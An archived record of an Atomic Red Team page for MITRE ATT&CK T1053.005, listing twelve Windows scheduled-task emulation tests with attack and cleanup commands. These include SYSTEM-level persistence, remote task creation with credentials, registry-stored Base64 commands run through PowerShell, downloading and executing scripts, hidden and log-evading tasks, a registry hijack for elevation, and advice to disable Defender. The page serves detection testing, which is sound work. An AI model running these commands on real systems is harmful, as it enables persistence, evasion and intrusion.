{
	"id": "ca9bed6e-b976-4bef-822c-de3079bde743",
	"created_at": "2026-04-06T01:31:02.607308Z",
	"updated_at": "2026-04-10T03:20:36.973663Z",
	"deleted_at": null,
	"sha1_hash": "effff03e25ec84a32d101541baba5e9afc1c6cde",
	"title": "atomic-red-team/atomics/T1053.005/T1053.005.md at master · redcanaryco/atomic-red-team",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 119646,
	"plain_text": "atomic-red-team/atomics/T1053.005/T1053.005.md at master ·\r\nredcanaryco/atomic-red-team\r\nBy Atomic Red Team doc generator\r\nArchived: 2026-04-06 00:23:08 UTC\r\nT1053.005 - Scheduled Task/Job: Scheduled Task\r\nDescription from ATT\u0026CK\r\nAdversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution\r\nof malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be\r\nrun directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator\r\nTools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET\r\nwrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library\r\nand Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the\r\nPowershell Cmdlet Invoke-CimMethod , which leverages WMI class PS_ScheduledTask to create a scheduled\r\ntask via an XML path.(Citation: Red Canary - Atomic Red Team)\r\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for\r\npersistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral\r\nMovement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to\r\nSystem Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask\r\none-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\r\nAdversaries may also create \"hidden\" scheduled tasks (i.e. Hide Artifacts) that may not be visible to defender\r\ntools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from schtasks\r\n/query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where\r\ndeletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask\r\nscheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g.,\r\nIndex value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows\r\nEnvironments)\r\nSource\r\nAtomic Tests\r\nAtomic Test #1: Scheduled Task Startup Script\r\nAtomic Test #2: Scheduled task Local\r\nAtomic Test #3: Scheduled task Remote\r\nAtomic Test #4: Powershell Cmdlet Scheduled Task\r\nAtomic Test #5: Task Scheduler via VBA\r\nAtomic Test #6: WMI Invoke-CimMethod Scheduled Task\r\nAtomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry\r\nAtomic Test #8: Import XML Schedule Task with Hidden Attribute\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 1 of 10\n\nAtomic Test #9: PowerShell Modify A Scheduled Task\r\nAtomic Test #10: Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\r\nAtomic Test #11: Scheduled Task Persistence via CompMgmt.msc\r\nAtomic Test #12: Scheduled Task Persistence via Eventviewer.msc\r\nAtomic Test #1: Scheduled Task Startup Script\r\nRun an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled\r\ntasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.\r\nSupported Platforms: Windows\r\nauto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nschtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\r\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\r\nCleanup Commands\r\nschtasks /delete /tn \"T1053_005_OnLogon\" /f \u003enul 2\u003e\u00261\r\nschtasks /delete /tn \"T1053_005_OnStartup\" /f \u003enul 2\u003e\u00261\r\nAtomic Test #2: Scheduled task Local\r\nUpon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71\r\nInputs\r\nName Description Type Default Value\r\ntask_command What you want to execute string C:\\windows\\system32\\cmd.exe\r\ntime What time 24 Hour string 20:10\r\nAttack Commands: Run with command_prompt !\r\nSCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}\r\nCleanup Commands\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 2 of 10\n\nSCHTASKS /Delete /TN spawn /F \u003enul 2\u003e\u00261\r\nAtomic Test #3: Scheduled task Remote\r\nCreate a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at\r\n20:10 on a remote endpoint.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd\r\nInputs\r\nName Description Type Default Value\r\ntask_command What you want to execute string C:\\windows\\system32\\cmd.exe\r\ntime What time 24 Hour string 20:10\r\ntarget Target string localhost\r\nuser_name Username to authenticate with, format: DOMAIN\\User string DOMAIN\\user\r\npassword Password to authenticate with string At0micStrong\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nSCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC da\r\nCleanup Commands\r\nSCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN \"Atomic task\" /F \u003enul 2\u003e\u00261\r\nAtomic Test #4: Powershell Cmdlet Scheduled Task\r\nCreate an atomic scheduled task that leverages native powershell cmdlets.\r\nUpon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.\r\nSupported Platforms: Windows\r\nauto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd\r\nAttack Commands: Run with powershell !\r\n$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\r\n$Trigger = New-ScheduledTaskTrigger -AtLogon\r\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 3 of 10\n\n$Set = New-ScheduledTaskSettingsSet\r\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\r\nRegister-ScheduledTask AtomicTask -InputObject $object\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"AtomicTask\" -confirm:$false \u003e$null 2\u003e\u00261\r\nAtomic Test #5: Task Scheduler via VBA\r\nThis module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute\r\n\"notepad.exe\" within 30 - 40 seconds after this module has run\r\nSupported Platforms: Windows\r\nauto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3\r\nInputs\r\nName Description Type Default Value\r\nms_product Maldoc application Word string Word\r\nAttack Commands: Run with powershell !\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-M\r\nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_pro\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"Run Notepad\" -Confirm:$false\r\nDependencies: Run with powershell !\r\nDescription: Microsoft #{ms_product} must be installed\r\nCheck Prereq Commands\r\ntry {\r\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\r\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\r\n Stop-Process -Name $process\r\n exit 0\r\n} catch { exit 1 }\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 4 of 10\n\nGet Prereq Commands\r\nWrite-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\r\nAtomic Test #6: WMI Invoke-CimMethod Scheduled Task\r\nCreate an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class\r\nPS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.\r\nSupported Platforms: Windows\r\nauto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b\r\nInputs\r\nName Description Type Default Value\r\nxml_path\r\npath of vbs to use when creating\r\nmasquerading files\r\npath PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\n$xml = [System.IO.File]::ReadAllText(\"#{xml_path}\")\r\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"R\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"T1053_005_WMI\" -confirm:$false \u003e$null 2\u003e\u00261\r\nDependencies: Run with powershell !\r\nDescription: File to copy must exist on disk at specified location (#{xml_path})\r\nCheck Prereq Commands\r\nif (Test-Path \"#{xml_path}\") {exit 0} else {exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory (split-path \"#{xml_path}\") -ErrorAction ignore | Out-Null\r\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_\r\nAtomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 5 of 10\n\nA Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The\r\nscheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism\r\nrecently seen in use by Qakbot.\r\nAdditiona Information\r\nSupported Platforms: Windows\r\nauto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba\r\nInputs\r\nName Description Type Default Value\r\ntime Daily scheduled task execution time string 07:45\r\nAttack Commands: Run with command_prompt !\r\nreg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\r\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([Syste\r\nCleanup Commands\r\nschtasks /delete /tn \"ATOMIC-T1053.005\" /F \u003enul 2\u003e\u00261\r\nreg delete HKCU\\SOFTWARE\\ATOMIC-T1053.005 /F \u003enul 2\u003e\u00261\r\nAtomic Test #8: Import XML Schedule Task with Hidden Attribute\r\nCreate an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. This\r\ntechnique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.\r\nSupported Platforms: Windows\r\nauto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4\r\nInputs\r\nName Description Type Default Value\r\nxml_path\r\npath of vbs to\r\nuse when\r\ncreating\r\nmasquerading\r\nfiles\r\npath PathToAtomicsFolder\\T1053.005\\src\\T1053_05_SCTASK_HIDDEN_ATTRIB.xml\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 6 of 10\n\n$xml = [System.IO.File]::ReadAllText(\"#{xml_path}\")\r\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"R\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"atomic red team\" -confirm:$false \u003e$null 2\u003e\u00261\r\nDependencies: Run with powershell !\r\nDescription: File to copy must exist on disk at specified location (#{xml_path})\r\nCheck Prereq Commands\r\nif (Test-Path \"#{xml_path}\") {exit 0} else {exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory (split-path \"#{xml_path}\") -ErrorAction ignore | Out-Null\r\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_S\r\nAtomic Test #9: PowerShell Modify A Scheduled Task\r\nCreate a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft\r\nWindows TaskScheduler Operational log modification of an action on a Task already registered. It will first be created to\r\nspawn cmd.exe, but modified to run notepad.exe.\r\nUpon successful execution, powershell.exe will create a scheduled task and modify the action.\r\nSupported Platforms: Windows\r\nauto_generated_guid: dda6fc7b-c9a6-4c18-b98d-95ec6542af6d\r\nAttack Commands: Run with powershell !\r\n$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\r\n$Trigger = New-ScheduledTaskTrigger -AtLogon\r\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\r\n$Set = New-ScheduledTaskSettingsSet\r\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\r\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\r\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\r\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\r\nCleanup Commands\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 7 of 10\n\nUnregister-ScheduledTask -TaskName \"AtomicTaskModifed\" -confirm:$false \u003e$null 2\u003e\u00261\r\nAtomic Test #10: Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\r\nCreate a scheduled task through manipulation of registry keys. This procedure is implemented using the GhostTask utility.\r\nBy manipulating registry keys under HKLM\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tree, the tool creates user-specified scheduled tasks without a corresponding\r\nWindows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a\r\ndownload of the GhostTask binary, which must be run as NT Authority\\SYSTEM. Upon successful execution of this test, a\r\nscheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further\r\nexploration of this procedure and guidance for hunting and detection, see Hunting G-G-G-GhostTasks!.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 704333ca-cc12-4bcf-9916-101844881f54\r\nInputs\r\nName Description Type Default Value\r\ntask_name Name of the newly-added task string lilghostie\r\ntask_command Command you want the task to execute string notepad.exe\r\ntarget System where the task should run string localhost\r\nuser_name\r\nUsername to authenticate with, such as\r\nATOMICDOMAIN\\AtomicAdmin\r\nstring\r\n$env:USERDOMAIN + '\\' +\r\n$env:USERNAME\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} add #{task_name} \"cmd.exe\" \"/c #{task_com\r\nCleanup Commands\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} delete #{task_name} \u003e nul\r\nDependencies: Run with powershell !\r\nDescription: PsExec tool from Sysinternals must exist in the ExternalPayloads directory\r\nCheck Prereq Commands\r\nif (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") { exit 0} else { exit 1}\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 8 of 10\n\nGet Prereq Commands\r\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\r\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\Exte\r\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\r\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloa\r\nDescription: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows\r\ndefender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command\r\nlike Add-MpPreference -ExclusionPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"\r\nCheck Prereq Commands\r\nif (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\") { exit 0} else { exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\r\nInvoke-WebRequest \"https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe\" -OutFile \"Pat\r\nAtomic Test #11: Scheduled Task Persistence via CompMgmt.msc\r\nAdds persistence by abusing compmgmt.msc via a scheduled task. When the Computer Management console is opened, it\r\nwill run a malicious payload (in this case, calc.exe ). This technique abuses scheduled tasks and registry modifications to\r\nhijack legitimate system processes.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2\r\nInputs\r\nName Description Type Default Value\r\ntask_name Name of the newly-created scheduled task string CompMgmtBypass\r\npayload Command you want the task to execute string calc.exe\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nreg add \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"c:\\windows\\S\r\nschtasks /Create /TN \"#{task_name}\" /TR \"compmgmt.msc\" /SC ONLOGON /RL HIGHEST /F\r\nECHO Let's open the Computer Management console now...\r\ncompmgmt.msc\r\nCleanup Commands\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 9 of 10\n\nreg delete \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /f\r\nschtasks /Delete /TN \"#{task_name}\" /F\r\nAtomic Test #12: Scheduled Task Persistence via Eventviewer.msc\r\nAdds persistence by abusing eventviewer.msc via a scheduled task. When the eventviewer console is opened, it will run a\r\nmalicious payload (in this case, calc.exe ).\r\nSupported Platforms: Windows\r\nauto_generated_guid: 02124c37-767e-4b76-9383-c9fc366d9d4c\r\nInputs\r\nName Description Type Default Value\r\ntask_name Name of the newly-created scheduled task string EventViewerBypass\r\npayload Command you want the task to execute string calc.exe\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nreg add \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"c:\\windows\\S\r\nschtasks /Create /TN \"#{task_name}\" /TR \"eventvwr.msc\" /SC ONLOGON /RL HIGHEST /F\r\nECHO Let's run the schedule task ...\r\nschtasks /Run /TN \"EventViewerBypass\"\r\nCleanup Commands\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /f\r\nschtasks /Delete /TN \"#{task_name}\" /F\r\nSource: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"
	],
	"report_names": [
		"T1053.005.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775439062,
	"ts_updated_at": 1775791236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/effff03e25ec84a32d101541baba5e9afc1c6cde.pdf",
		"text": "https://archive.orkl.eu/effff03e25ec84a32d101541baba5e9afc1c6cde.txt",
		"img": "https://archive.orkl.eu/effff03e25ec84a32d101541baba5e9afc1c6cde.jpg"
	}
}